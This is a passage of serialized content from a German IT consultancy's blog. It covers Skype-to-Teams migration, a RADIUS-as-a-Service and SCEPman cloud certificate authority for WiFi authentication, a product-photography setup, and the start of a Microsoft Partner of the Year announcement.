damit der Vergangenheit an.",[353,3359,3360,3361,3364],{},"Trotz unserer großen Begeisterung für Technik und Innovation brauchte es seine Zeit, bis wir uns mit den Möglichkeiten von Teams vertraut gemacht hatten, und auch das eine oder andere Feature vermissten. Zum Beispiel fehlt uns immer noch die reibungslose Kommunikation mit anderen Unternehmen, da die ",[433,3362,3363],{},"Federation weiterhin über einen Skype Gateway"," in Office 365 gesteuert wird und somit Einschränkungen in der Interoperabilität zwischen Teams & Skype entstehen. Solange Skype for Business und Teams nebeneinander koexistieren, werden wir mit der einen oder anderen Hürde leben müssen. Microsoft ist sich dessen bewusst und hilft hier dem Benutzer an den entscheidenden Stellen. So erhält er z.B. einen Hinweis, wenn er mit Teilnehmern außerhalb der eigenen Organisation kommuniziert, dass nicht alle Features zur Verfügung stehen,",[353,3366,3367],{},[356,3368],{"alt":3369,"src":3370},"Federation_SfB-to_Teams","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/Federation_Some-Teams-Features-Not-Availalbe.jpg",[353,3372,3373],{},"oder wenn ein Teilnehmer noch nicht auf Teams umgestellt hat.",[353,3375,3376],{},[356,3377],{"alt":3378,"src":3379},"Internal_SfB-to_Teams","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/Using-SfB-Some-Teams-Features-Not-Availalbe.jpg",[353,3381,3382],{},"Versucht ein Skype for Business Teilnehmer mit einem Teams-Only-Benutzer seinen Bildschirm zu teilen, wird hierfür eine Skype-Besprechung angeboten, welche über den bereitgestellten Link sofort gestartet werden kann. Hierfür kann auch problemlos der Skype Web Client verwendet werden, sodass der Desktop Client nicht mehr benötigt wird.",[353,3384,3385],{},[356,3386],{"alt":3387,"src":3388},"DesktopSharing_SfB-to-Teams","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/DesktopSharing_SfB-Teams.jpg",[353,3390,3391],{},"Als Konsequenz hat Microsoft kürzlich damit begonnen, den Skype for Business Desktop Client als Bestanteil von Office 365 ProPlus gegen den Teams Desktop Client auszutauschen.",[353,3393,3394],{},[374,3395,3398],{"href":3396,"rel":3397},"https://docs.microsoft.com/de-de/deployoffice/teams-install",[378],"(...) starting in late February 2019, Teams will be installed by default for new installations of Office 365 ProPlus, starting with Version 1902 in Monthly Channel",[353,3400,3401,3402,3405],{},"Bis aber eine vollständige ",[433,3403,3404],{},"Teams zu Teams-Federation"," zur Verfügung steht, wird es wohl noch etwas dauern. Aber auch hier wird deutlich, dass über kurz oder lang die Probleme mit Edge-Servern, Zertifikaten oder DNS-SRV-Einträgen der Vergangenheit angehören.",[353,3407,3408,3409,3411,3412,3415],{},"Insgesamt wird schnell klar, dass nicht jeder Kunde direkt in einem Schritt den kompletten Schalter umlegen kann. Daher gibt es neben dem ",[433,3410,3352],{}," auch noch weitere Modi, welche einen reibungslosen Übergang ermöglichen sollen. So hat man z.B. mit dem ",[433,3413,3414],{},"Teams Island-Mode"," die Möglichkeit, den Skype for Business und den Teams Client parallel zu betreiben. Das bedeutet in der Konsequenz aber auch, dass ein Benutzer beide Clients aktiv in Verwendung haben muss, denn eingehende Skype Nachrichten landen im Skype Client, genauso wie die Teams Nachrichten im Teams Client landen.",[353,3417,3418,3419,3422,3423,3426,3427,3430,3431,3434],{},"Zwei weitere Modi ermöglichen Teams als Collaboration Tool (",[433,3420,3421],{},"Skype for Business with Teams collaboration",") oder als Collaboration & Meeting Tool (",[433,3424,3425],{},"Skype for Business with Teams collaboration and meetings",") einzusetzen. Wenn Teams noch nicht verwendet werden soll, kann man in der Phase der Migrationsplanung und Vorbereitung auch den Modus ",[433,3428,3429],{},"Skype for Business Only"," konfigurieren, sodass in der Phase der Migration Teams kontrolliert und schrittweise eingeführt werden kann. Hier gilt es allerdings zu beachten, dass Chats und Anrufe jetzt wieder im Skype Client ankommen, aber der Teams Client trotzdem genutzt werden kann. Chat und Calling müssen separat durch Polices deaktiviert werden. Microsoft hat angekündigt, diese Policies demnächst automatisch beim Setzen der verschiedenen ",[433,3432,3433],{},"Skype for Business-Modi"," zu berücksichtigen.",[353,3436,3437],{},[356,3438],{"alt":3439,"src":3440},"GrantTeamUpgrade_SfBWithTeamsCollab","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/GrantTeamsUpgrade_SfBWithTeamsCollab.jpg",[353,3442,3443,3444,3451,3452,993,3459,3466,3467,3472,3473,3478],{},"Im Bereich Telefonie hat sich auch einiges getan. Mit dem ",[374,3445,3448],{"href":3446,"rel":3447},"https://docs.microsoft.com/en-us/MicrosoftTeams/shared-line-appearance",[378],[433,3449,3450],{},"Shared line Appearance (SLA)","-Feature lassen sich klassische Chef-/Sekretärinnen-Szenarien umsetzen, ",[374,3453,3456],{"href":3454,"rel":3455},"https://docs.microsoft.com/en-us/MicrosoftTeams/cloud-voice-landing-page#call-queues",[378],[433,3457,3458],{},"Call Queues",[374,3460,3463],{"href":3461,"rel":3462},"https://docs.microsoft.com/en-us/MicrosoftTeams/cloud-voice-landing-page#auto-attendants",[378],[433,3464,3465],{},"Auto Attendant"," ermöglichen eine Anrufverteilung für Gruppen wie z.B. für einen Servicedesk. Mit ",[374,3468,3470],{"href":1460,"rel":3469},[378],[433,3471,1332],{}," können über ",[374,3474,3477],{"href":3475,"rel":3476},"https://docs.microsoft.com/en-us/microsoftteams/direct-routing-border-controllers",[378],"zertifizierte Gateways bzw. Session Border Controllers"," vorhandene Anschlüsse direkt an das Telefonsystem von Teams angebunden werden und ermöglichen somit eine vollständige Integration von Teams in eine bestehende Telefonanlage, auch wenn Fax- und Analoggeräte noch nicht auf eine moderne Alternative migriert wurden.",[353,3480,3481,3482,3485,3486,3491,3492,3497,3498,3503,3504,3509,3510,3513],{},"Auch das Device Portfolio rund um Teams stellt sich deutlich runder da, als es in den Anfängen der Fall war. Die Skype for Business Room Systems wurden zu ",[433,3483,3484],{},"Teams Room Systems"," portiert (",[374,3487,3490],{"href":3488,"rel":3489},"https://techcommunity.microsoft.com/t5/Microsoft-Teams-Blog/Introducing-Microsoft-Teams-Rooms/ba-p/323848",[378],"Introducing Microsoft Teams Rooms","). Auf der ISE in Amsterdam im Februar diesen Jahres wurde die Bandbreite der neuen Geräte Generation vom Microsoft Teams live zur Schau gestellt. (",[374,3493,3496],{"href":3494,"rel":3495},"https://techcommunity.microsoft.com/t5/Microsoft-Teams-Blog/Microsoft-Teams-Devices-at-ISE-2019/ba-p/335279",[378],"Microsoft Teams Devices at ISE 2019","). Eine Übersicht über alle Teams kompatiblen Geräte können über den ",[374,3499,3502],{"href":3500,"rel":3501},"https://products.office.com/en-us/microsoft-teams/across-devices/devices/category?devicetype=34",[378],"Teams Marketplace"," abgefragt werden. Glück & Kanja wird im April auf der ",[374,3505,3508],{"href":3506,"rel":3507},"https://www.glueckkanja.com/unternehmen/teams-and-skype-users-group/",[378],"Teams und Skype User Groups"," erstmalig die neuen nativen Teams Phone Devices von ",[433,3511,3512],{},"Audiocodes & Yealink"," vorstellen und demonstrieren.",[353,3515,3516,3517,3520,3521,3524],{},"Es wird schnell deutlich, dass man sich eine gute Strategie für den ",[433,3518,3519],{},"Wechsel auf Teams"," überlegen muss, denn die Interaktion innerhalb der Übergangsphase erfordert eine gewisse Einarbeitung für den Endanwender, um sich in Microsoft Teams zurechtzufinden und auch entsprechend anzuwenden. Es ist somit entscheidend, dass hier nicht nur die Infrastruktur vorbereitet wird, die Clients ausgerollt und die Dokumentation bereitgestellt werden muss. Vielmehr bedarf es ",[433,3522,3523],{},"einem gezielten User Change Management",", welches den Benutzer bei dieser Reise in die neue Welt der Zusammenarbeit an die Hand nimmt und ihm damit auch aufzeigt, welches Potential und welchen großer Mehrwert sich durch den Einsatz von Teams ergibt. Gefragt ist somit nicht nur die IT-Abteilung, sondern das Thema muss auch vom Management getrieben und von der Unternehmenskommunikation positioniert, sowie durch gezieltes Marketing in allen Bereichen des Unternehmens begleitet werden.",[353,3526,3527,3528,3531],{},"Teams zeigt deutlich den Wandel des ",[433,3529,3530],{},"Modern Workplace"," und schmiegt sich hier perfekt in den neuen Arbeitsplatz der Zukunft, geprägt von teamübergreifender Zusammenarbeit, ein. Egal ob interne Mitarbeiter, externe Kunden oder Gäste zu einem Team eingeladen werden, dank vielseitiger Möglichkeiten im LifeCycle und im Governance steht einer effektiven und sicheren Arbeitsweise nichts mehr im Wege und liefert somit auch eine Plattform, die nicht nur Young Professionals begeistert, sondern von den inzwischen fast fünf Generationen an Mitarbeitern im Unternehmen angenommen und akzeptiert wird.",[353,3533,3534],{},"Sprechen Sie uns an. Gerne unterstützen wir Sie bei dieser spannenden Reise und begleiten Sie mit einem ganzheitlichen Ansatz.",{"title":402,"searchDepth":403,"depth":403,"links":3536},[],"Lange waren Communication & Collaboration für uns zwei getrennte Welten, und wir benutzten unterschiedliche Anwendungen für die Zusammenarbeit mit unseren Kunden und Partnern wie auch mit den Kollegen in internen Projekten. Für unsere gesamte Kommunikation basierend auf Chat, Audio- sowie Videoanrufen hatten wir über die Jahre Skype for Business lieben gelernt. Unsere Zusammenarbeit organisierten wir hingegen über E-Mail (Exchange), Team-Sites (Share Point) und unlängst auch über moderne Gruppen (Office 365 Groups) beispielsweise für die Terminplanung innerhalb eines Projektes. Diese Vielzahl an Anwendungen machte es mitunter schwierig, den Überblick zu behalten, zumal sie sich auch nicht immer reibungslos miteinander integrieren ließen.",{"categories":3539,"blogtitlepic":3540,"thumb":3541,"socialimg":3542,"customExcerpt":3543},[534],"head-skype-to-teams","thumb-skype-to-teams","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-skype-to-teams.jpg","Unser Kollege Ralf Mania gibt einen Überblick über die aktuellen Entwicklungen im Bereich Microsoft Teams.","2019-03-20","/posts/2019-03-20-skype-to-teams",{"title":3301,"description":3537},"posts/2019-03-20-skype-to-teams",[534,964,964,3549,1408,3550],"Communication","Enterprise Voice","XNnhQtiCV5vCPA-yUTinxeFf6HZ1E7_9_7jGQUIx4jA",{"id":3553,"title":3554,"author":1630,"body":3555,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":3685,"moment":3691,"navigation":415,"path":3692,"seo":3693,"stem":3694,"tags":3695,"webcast":406,"__hash__":3700},"content_de/posts/2019-04-14-scepman.md","Netzwerkzugang mit RADIUS-as-a-Service und SCEPman",{"type":350,"value":3556,"toc":3679},[3557,3561,3576,3580,3598,3607,3610,3613,3619,3622,3625,3628,3632,3641,3649,3658,3661,3667,3670],[2548,3558,3560],{"id":3559},"netzwerke-absichern","Netzwerke absichern",[353,3562,3563,3564,3569,3570,3575],{},"Wie ich jüngst im ",[374,3565,3568],{"href":3566,"rel":3567},"https://www.glueckkanja.com/blog/cloud/pki/2018/07/pki-in-der-cloud/",[378],"iX-Artikel"," über PKI in Zeiten der Cloud beschrieben habe, ist WiFi-Authentifizierung oft die letzte Daseinsberechtigung für eine eigene PKI. Es gibt zwar verschiedene WiFi-Authentifizierungsmethoden, die ohne Zertifikate auskommen, aber keine ist so sicher und komfortabel. Bei Shared Secrets ist nicht kontrollierbar, welche Geräte WiFi-Zugang erhalten. Forms-basierte Authentifizierung, wie sie ",[374,3571,3574],{"href":3572,"rel":3573},"https://docs.microsoft.com/en-us/intune/network-access-control-integrate",[378],"von mehreren Anbietern beworben und angeboten wird",", verursacht Probleme mit Anwendungen, die den Anmeldedialog nur als gestörte Internetverbindung wahrnehmen, oder wenn die Forms-Erkennung mit dem neuesten Browser- oder Betriebssystem-Patch nicht mehr funktioniert. Passwortbasierte Nutzerauthentifizierung lässt sich nicht auf Geräte einschränken und Backups der Passwörter landen bei Google und Apple, während passwortbasierte Computerauthentifizierung ohnehin nur mit AD-Windows-Maschinen funktioniert.",[629,3577,3579],{"id":3578},"radius-as-a-service","RADIUS-as-a-Service",[353,3581,3582,3583,3588,3589,3592,3593,456],{},"Glück & Kanja bietet deswegen seit geraumer Zeit unseren ",[374,3584,3587],{"href":3585,"rel":3586},"https://tools.ietf.org/html/rfc2865",[378],"RADIUS","-as-a-Service an. Dabei nutzen wir aus, dass Microsoft Intune ohnehin Zertifikate an alle Geräte verteilt, die über Intune verwaltet werden. Intune nutzt das Zertifikat intern, um die Geräte zu erkennen und zu authentifizieren. Da das Zertifikat für die Extended Key Usage ",[748,3590,3591],{},"Client Authentication"," zugelassen ist, kann man es auch für andere Client-Authentifizierungsvorgänge nutzen – zum Beispiel WiFi-Authentifizierung auf Basis von ",[374,3594,3597],{"href":3595,"rel":3596},"https://ieeexplore.ieee.org/document/5409813",[378],"802.1x",[353,3599,3600,3601,3606],{},"Weil die Zertifikate tenant-übergreifend von einer zentralen Intune-CA ausgestellt werden, muss man jedoch bei der Authentifizierung unbedingt prüfen, ob das Zertifikat und damit die Maschine eigentlich zum eigenen Tenant gehört. Leider können gängige RADIUS-Produkte wie der Microsoft NPS und die Cisco ISE die Zertifikatserweiterung nicht auslesen, in der im Zertifikat die Tenant-ID hinterlegt ist. Unser RADIUS-as-a-Service basiert auf dem bewährten ",[374,3602,3605],{"href":3603,"rel":3604},"https://freeradius.org/",[378],"FreeRADIUS-Server",", wurde aber so erweitert, dass er die entsprechenden Zertifikatserweiterungen erkennt und auswertet.",[353,3608,3609],{},"Die Einrichtung ist damit sehr einfach. Wir richten für jeden Kunden eine RADIUS-Schnittstelle in unserem Dienst ein. Der Kunde fügt seinen Access Points eine SSID hinzu, die auf unseren RADIUS-Dienst verweist (IP, Port & Shared Secret). Schließlich legt man in Intune ein Configuration Profile mit den WiFi-Einstellungen an. Schon können sich die eigenen Rechner, und nur diese, mit dem WiFi verbinden.",[353,3611,3612],{},"Die Intune-Zertifikate werden nie widerrufen, sie erhalten nicht mal eine CDP- oder OCSP-Erweiterung, die technisch vorausgesetzt wird, um sie überhaupt widerrufen zu können. Deswegen kann unser RADIUS-as-a-Service auch prüfen, ob die dem Zertifikat zugeordnete Maschine überhaupt noch im AAD vorhanden ist. Wenn nicht, wird die Authentifizierung abgelehnt. Das hat den zusätzlichen Vorteil, dass die Verwaltung des AADs ausreicht und nicht zusätzlich noch eine Sperrliste verwaltet werden muss, außerdem funktioniert die Zugangssperrung somit sogar in Echtzeit. Das folgende Diagramm zeigt diese Interaktion:",[353,3614,3615],{},[356,3616],{"alt":3617,"src":3618},"Radius Diagram","https://res.cloudinary.com/c4a8/image/upload/blog/pics/radius-sequence-diagram.svg",[353,3620,3621],{},"Mit seiner einfachen Struktur findet unser RADIUS-as-a-Service Anklang bei unseren Kunden. Zwei Wermutstropfen muss man dabei aber schlucken.",[353,3623,3624],{},"Zum einen kann man in Intune WiFi-Profile mit zertifikatsbasierter Authentifizierung zunächst nur verteilen, wenn man auch das entsprechende Zertifikat über ein Configuration Profile verteilt. Da das Intune-Zertifikat von selbst schon da ist, fehlt hier die entsprechende Auswahl. Auf Windows ist ein Workaround über ein Konfigurations-XML möglich, bei anderen Plattformen geht es so nicht.",[353,3626,3627],{},"Zum anderen gibt Microsoft keine Garantien zu den Eigenschaften des Zertifikats. Microsoft hat in der Vergangenheit bereits verschiedene Eigenschaften des ausgestellten Zertifikats geändert und wird dies wahrscheinlich auch in Zukunft tun. Möglicherweise verhindert eine zukünftige Änderung die Nutzung als WiFi-Zertifikat. Das betrifft dann natürlich nur ab dieser Änderung neu eingerichtete Clients, denn vorhandene Zertifikate sind für ihre Restlaufzeit von bis zu einem Jahr weiterhin gültig. Dennoch ist dies ein Risiko für die Infrastruktur, weil die IT so zu Änderungen in ihrer WiFi-Strategie gezwungen sein kann.",[629,3629,3631],{"id":3630},"scepman","SCEPman",[353,3633,3634,3635,3640],{},"Diese Nachteile löst unser neues Produkt SCEPman. ",[374,3636,3639],{"href":3637,"rel":3638},"https://tools.ietf.org/html/draft-gutmann-scep",[378],"SCEP ist das Simple Certificate Enrollment Protocol"," und wurde ursprünglich von CISCO erfunden, um Netzwerkgeräte wie Switches und Router ohne Nutzerinteraktion mit Zertifikaten zu versorgen. Der ursprüngliche Anwendungsfall rückte irgendwann in den Hintergrund, heutzutage dient das Protokoll primär im MDM-Umfeld dazu, Mobilgeräte mit Zertifikaten zu versorgen und ist dabei der de-facto-Standard. Das Protokoll basiert auf HTTP und ist damit auch besonders Cloud-geeignet.",[353,3642,3643,3644,456],{},"Microsoft bietet mit dem Network Device Enrollment Service (NDES) einen eigenen SCEP-Server, der im Hintergrund aber eine vollwertige Microsoft CA benötigt. NDES erfordert einen weiteren Server und braucht zur technischen Einrichtung nach meiner Erfahrung etwa so viel Aufwand wie der Aufbau einer Root- und Sub-CA der eigentlichen PKI. Dafür kann man über Intune an alle Plattformen ein Configuration Profile vom Typ \"SCEP\" verteilen. Alle von Intune unterstützen Betriebssysteme haben einen SCEP-Client eingebaut, der von einem SCEP-Server Zertifikate beziehen kann. Den SCEP-Dienst sollte man dabei ins Internet publizieren, zum Beispiel über einen ",[374,3645,3648],{"href":3646,"rel":3647},"https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/application-proxy",[378],"AAD Application Proxy",[353,3650,3651,3652,3657],{},"SCEPman dagegen ist eine Certification Authority (CA) direkt in der Cloud, die Zertifikate nur über SCEP verteilt. Als App Service muss man für den Betrieb nicht mal eine VM verwalten. Beim CA-Zertifikat haben wir das Rad nicht neu erfunden, sondern nutzen ",[374,3653,3656],{"href":3654,"rel":3655},"https://azure.microsoft.com/en-us/services/key-vault/",[378],"Microsoft Azure Key Vault"," – die Allround-Lösung von Microsoft zur Sicherung hochsensibler Informationen. SCEPman richtet ein Key Vault samt CA-Zertifikat bei der Installation ein, so dass man sich für den erfolgreichen Start und Betrieb von SCEPman um nichts kümmern muss. Mit Azure Key Vault als Standard-Produkt hat man dennoch alle Möglichkeiten: Man kann den CA-Schlüssel durch ein Hardware Security Module (HSM) absichern, ein neues selbstsigniertes Root-Zertifikat hinterlegen (BYOK) oder durch ein Sub-CA-Zertifikat einer vorhandenen PKI ersetzen.",[353,3659,3660],{},"Bei der Einrichtung wird man auch bei SCEPman ein SCEP-Profile in Intune anlegen. Die Clients erzeugen dann lokal ein Schlüsselpaar und einen Zertifikatsantrag, den sie SCEPman schicken. SCEPman leitet den Zertifikatsantrag zur Prüfung an Intune weiter, das bestätigen muss, dass der Antrag wirklich von Intune ausgelöst wurde. SCEPman erstellt dann aus dem Antrag ein Zertifikat und signiert es mit dem in Azure Key Vault hinterlegten CA-Schlüssel und -Zertifikat. Dieses Zertifikat sendet SCEPman zurück an den Client, der es zur Authentifizierung nutzen kann. Das folgende Diagramm zeigt die Zertifikatsverteilung über SCEPman:",[353,3662,3663],{},[356,3664],{"alt":3665,"src":3666},"Zertifikatsverteilung mit SCEPman","https://res.cloudinary.com/c4a8/image/upload/v1620811170/blog/pics/scep-man-raas.png",[353,3668,3669],{},"Somit ist SCEPman kostengünstig, hochverfügbar, sicher und einfach im Betrieb. Er funktioniert mit allen Intune-unterstützten Plattformen, also Windows, iOS, Android und macOS. Auf Dienstseite werden die ausgestellten Zertifikate von allen gängigen Wireless-LAN-Controllern (WLC) unterstützt und natürlich auch von unserem RADIUS-as-a-Service.",[353,3671,3672,3673,3678],{},"Wer seinen vorhandenen WLC weiterverwendet, möchte sicher trotzdem gerne bestimmte Geräte aus dem eigenen WiFi aussperren, zum Beispiel weil man sie verloren hat oder weil sie ausgemustert wurden. SCEPman bietet diese Funktion über einen ",[374,3674,3677],{"href":3675,"rel":3676},"https://tools.ietf.org/html/rfc6960",[378],"Online Certificate Status Protocol Responder (OCSP Responder)",". Bei OCSP kann ein System, hier der WLC, den Wideruf eines Zertifikats prüfen, indem er bei einer im Zertifikat von der CA eingetragenen URL nachfragt, ob das Zertifikat noch gültig ist. Der SCEPman prüft dazu, ob es die Maschine noch im AAD gibt, für die das Zertifikat ausgestellt wurde – wenn ja, ist das Zertifikat gültig, wenn nein, ist das Zertifikat widerrufen. Löscht man eine Maschine aus dem AAD, ist damit ab sofort keine Anmeldung am WiFi mehr möglich.",{"title":402,"searchDepth":403,"depth":403,"links":3680},[3681],{"id":3559,"depth":403,"text":3560,"children":3682},[3683,3684],{"id":3578,"depth":704,"text":3579},{"id":3630,"depth":704,"text":3631},{"categories":3686,"blogtitlepic":3687,"thumb":3688,"socialimg":3689,"customExcerpt":3690},[2949],"head-radius-scepman","thumb-radius-scepman","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-radius-scepman.jpg","Mit RADIUS-as-a-Service und SCEPman benötigen Sie auch für die WiFi-Authentifizierung keine eigene PKI mehr.","2019-04-14","/posts/2019-04-14-scepman",{"title":3554,"description":402},"posts/2019-04-14-scepman",[3631,3696,3631,1522,3697,3698,3587,3699],"RADIUSaaS","NDES","WiFi","Authentication","YvISRR9F2he-xkmzXx1q1mNiqt-qgfiK7WL3lON0GNc",{"id":3702,"title":3703,"author":191,"body":3704,"cta":3,"description":3708,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":3799,"moment":3804,"navigation":415,"path":3805,"seo":3806,"stem":3807,"tags":3808,"webcast":406,"__hash__":3812},"content_de/posts/2019-05-31-gk-keyvisuals.md","Behind the Scenes: So entstehen unsere Keyvisuals",{"type":350,"value":3705,"toc":3795},[3706,3709,3713,3774,3778,3781,3786,3789,3792],[353,3707,3708],{},"Heute werfen wir mal wieder einen Blick hinter die Kulissen und zeigen, wie unsere coolen Cardboard Keyvisuals für das Web entstehen. Die Grundlage hierfür ist denkbar unkompliziert. Mit einigen wenigen Hilfsmitteln aus dem Fachmarkt, ein bisschen Licht und natürlich einer guten Kamera lässt sich ein einfacher, zweckmäßiger Aufbau realisieren.",[2548,3710,3712],{"id":3711},"was-man-hierzu-braucht","Was man hierzu braucht?",[367,3714,3715,3726,3734,3742,3750,3758,3766],{},[370,3716,3717],{},[3102,3718,3723],{"className":3719,"code":3721,"language":3722},[3720],"language-text","     Weißer Hintergrundstoff\n","text",[3724,3725,3721],"code",{"__ignoreMap":402},[370,3727,3728],{},[3102,3729,3732],{"className":3730,"code":3731,"language":3722},[3720],"     Tischtennisplatte\n",[3724,3733,3731],{"__ignoreMap":402},[370,3735,3736],{},[3102,3737,3740],{"className":3738,"code":3739,"language":3722},[3720],"     Hintergrundgestell\n",[3724,3741,3739],{"__ignoreMap":402},[370,3743,3744],{},[3102,3745,3748],{"className":3746,"code":3747,"language":3722},[3720],"     Stativ für Kamera\n",[3724,3749,3747],{"__ignoreMap":402},[370,3751,3752],{},[3102,3753,3756],{"className":3754,"code":3755,"language":3722},[3720],"     Zwei Blitze\n",[3724,3757,3755],{"__ignoreMap":402},[370,3759,3760],{},[3102,3761,3764],{"className":3762,"code":3763,"language":3722},[3720],"     Strahler\n",[3724,3765,3763],{"__ignoreMap":402},[370,3767,3768],{},[3102,3769,3772],{"className":3770,"code":3771,"language":3722},[3720],"     Klemmen\n",[3724,3773,3771],{"__ignoreMap":402},[2548,3775,3777],{"id":3776},"worauf-man-achten-sollte","Worauf man achten sollte?",[353,3779,3780],{},"Um die Objekte später besonders gut freistellen zu können, haben wir den Hintergrund wie eine Hohlkehle geformt. Hierdurch wird ein nahtloser Übergang von Wand zum Boden möglich und abgrenzende Raumlinien sind nicht mehr sichtbar. Als Unterlage hierfür verwenden wir eine einseitig hochgeklappte Tischtennisplatte. Sie ermöglicht es ausserdem aus einer erhöhten Position zu fotografieren, was das Arbeiten deutlich angenehmer macht. Den weißen Hintergrundstoff haben wir darauf mit Federklemmen weitgehend faltenfrei befestigt.",[353,3782,3783],{},[356,3784],{"alt":3617,"src":3785},"https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/setup-fotografie.jpg",[353,3787,3788],{},"Für die Objektfotografie spielt die Beleuchtung eine zentrale Rolle. Um Tiefe zu erzeugen, wollen wir harte Schatten unterhalb der Buchstaben haben, müssen jedoch gleichzeitig darauf achten, dass sie frontal weiterhin korrekt ausgeleuchtet werden, ohne diese Schatten wieder aufzuweichen. Hierfür verwenden wir drei Strahler, die wir mit Hilfe eines Gestells direkt über den Buchstaben angebracht haben. Zusätzlich arbeiten wir mit zwei entfesselten Blitzen, die dafür sorgen, dass der Hintergrund deutlich stärker belichtet wird, um so eine nahezu durchgängige weisse Hintergrundfläche zu erreichen.",[353,3790,3791],{},"Für die Anordnung der Buchstaben berücksichtigen wir die übliche Blickrichtung von links nach rechts. Außerdem halten wir uns an die Regel, parallel zum Objekt zu fotografieren, um eine gleichbleibende Schärfe über das ganze Bild zu erreichen. Wir haben mit einer Brennweite von 30 mm im manuellen Modus mit ISO 100, einer Verschlusszeit von 1/80s und einer Blende von f/2,8 fotografiert.",[353,3793,3794],{},"Durch die sorgfältige Vorarbeit reduziert sich die Nachbearbeitung mit Adobe Lightroom und Photoshop auf ein Minimum. Die Buchstaben lassen sich nun mit vergleichsweise geringem Aufwand in Photoshop freistellen und erhalten zum Abschluss ihren Wasserfarben-Klecks.",{"title":402,"searchDepth":403,"depth":403,"links":3796},[3797,3798],{"id":3711,"depth":403,"text":3712},{"id":3776,"depth":403,"text":3777},{"categories":3800,"blogtitlepic":3801,"thumb":3802,"socialimg":3785,"customExcerpt":3803},[410],"head-gk-keyvisuals","thumb-gk-keyvisuals","Wir werfen einen Blick hinter die Kulissen und zeigen, wie unsere coolen Cardboard Keyvisuals für das Web entstehen.","2019-05-31","/posts/2019-05-31-gk-keyvisuals",{"title":3703,"description":3708},"posts/2019-05-31-gk-keyvisuals",[3809,3810,3811],"Brand","Marketing","Design","PMLmBWIVMkN-ernW4-ulm2KBFdsjtjX9cyYnBeD8Mx8",{"id":3814,"title":3815,"author":191,"body":3816,"cta":3,"description":3822,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":3923,"moment":3928,"navigation":415,"path":3929,"seo":3930,"stem":3931,"tags":3932,"webcast":406,"__hash__":3936},"content_de/posts/2019-06-06-gk-microsoft-partner-of-the-year.md","Glück & Kanja ist erneut Microsoft Partner of the Year",{"type":350,"value":3817,"toc":3920},[3818,3823,3830,3836,3839,3846,3856,3878,3885,3888,3892],[353,3819,3820],{},[433,3821,3822],{},"Glück & Kanja Consulting AG wird als Microsoft Country Partner of the Year for Germany und zusätzlich als Microsoft Global Modern Desktop Partner of the Year ausgezeichnet.",[353,3824,3825,3826,3829],{},"Microsoft gab heute bekannt, die Glück & Kanja Consulting AG ",[433,3827,3828],{},"gleich zweifach"," als Microsoft Partner of the Year 2019 auszuzeichnen. Der Preis wird in diesem Jahr auf der weltweiten Partnerkonferenz von Microsoft in Las Vegas vor rund 20.000 Teilnehmern aus 140 Ländern offiziell vergeben. Glück & Kanja gehört dabei nicht nur zu den wenigen Unternehmen, die diese begehrte Auszeichnung überhaupt jemals erhalten haben, sondern setzt sich gleich in zwei wichtigen Kategorien durch. Damit nicht genug, ist es auch noch ein Wiederholungssieg, denn schon 2017 konnte Glück & Kanja den Award für sich verbuchen.",[353,3831,3832,3833,3835],{},"Christian Kanja, Vorstand der Glück & Kanja, freut sich über die doppelte Auszeichnung aus Redmond: “Es war eine Wette auf die Zukunft. Wir hatten von Anfang an die enormen Vorteile vor Augen, die Komplexität hybrider Infrastrukturen zu vermeiden. Vergleichbar mit Tesla in der Automobilindustrie hatte Microsoft die richtige Vision, aber es gab viele Vorbehalte im Markt und viele technische Probleme zu lösen. Durch die frühe Fokussierung auf ",[433,3834,2845],{}," konnten wir überzeugende Antworten liefern und den Erfolg mittlerweile hunderttausendfach beweisen. Microsoft hat uns jetzt erneut darin bestätigt, den eingeschlagenen Weg konsequent weiterzugehen.”",[353,3837,3838],{},"Die Auszeichnungen wurden in mehreren Kategorien vergeben, wobei die Gewinner aus einer Reihe von mehr als 2.900 Teilnehmern aus 115 Ländern ausgewählt wurden. Glück & Kanja wurde für herausragende Lösungen und Dienstleistungen in der Modern Desktop-Architektur sowie für ein hervorragendes Engagement in Deutschland ausgezeichnet.",[353,3840,3841,3842,3845],{},"In der nationalen Kategorie ",[433,3843,3844],{},"‘Country Partner of the Year’"," konnte die gemeinsame Bewerbung von GAB, Glück & Kanja und PHAT überzeugen. Die drei Microsoft-Partner aus München, Offenbach und Hamburg haben in den letzten zwei Jahren die Microsoft Cloud-Technologien in vielen Projekten konsequent und mit starker Standardisierung umgesetzt und dabei einen gemeinsamen ’100% Cloud’ Blueprint entwickelt, der am Markt einzigartig ist. Die geteilte Erfahrung und der intensive Austausch führt zu einem bisher unerreichten Grad an Verlässlichkeit bei der Einführung von Microsofts Cloud-Lösungen.",[353,3847,3848,3849,3852,3853],{},"International konnte Glück & Kanja die Expertise im Bereich ",[433,3850,3851],{},"‘Modern Desktop’"," weiter ausbauen. Die Offenbacher gehören zur absoluten Weltspitze wenn es darum geht, Arbeitsplätze im Enterprise-Umfeld vollständig unabhängig von traditionellen IT-Infrastrukturen zu betreiben. Mittlerweile auch als ‘Starbucks-Deployment’ bekannt, hat Glück & Kanja in den letzten Jahren maßgeblich dazu beigetragen, ",[433,3854,3855],{},"moderne Arbeitsplätze komplett aus der Cloud zu versorgen - einschließlich der notwendigen Applikationen und eingebettet in modernste Sicherheitsstrukturen.",[353,3857,3858,3859,3863,3864,3870,3871,3877],{},"Die Teams von Glück & Kanja haben dabei aber nicht nur bei der Architektur von Microsoft-Systemen unterstützt. Das Unternehmen hat auch mit Managed Services ein Angebot für Kunden, die den Betrieb einer Cloud-Umgebung gemeinsam mit einem Partner gestalten wollen. Eine ",[374,3860,3862],{"href":492,"rel":3861},[378],"‘Package-Factory’"," - eine Art App Store für Unternehmen - bietet den Zugang zur aktuell größten Applikationsbasis fertiger Microsoft Intune-Pakete, ein 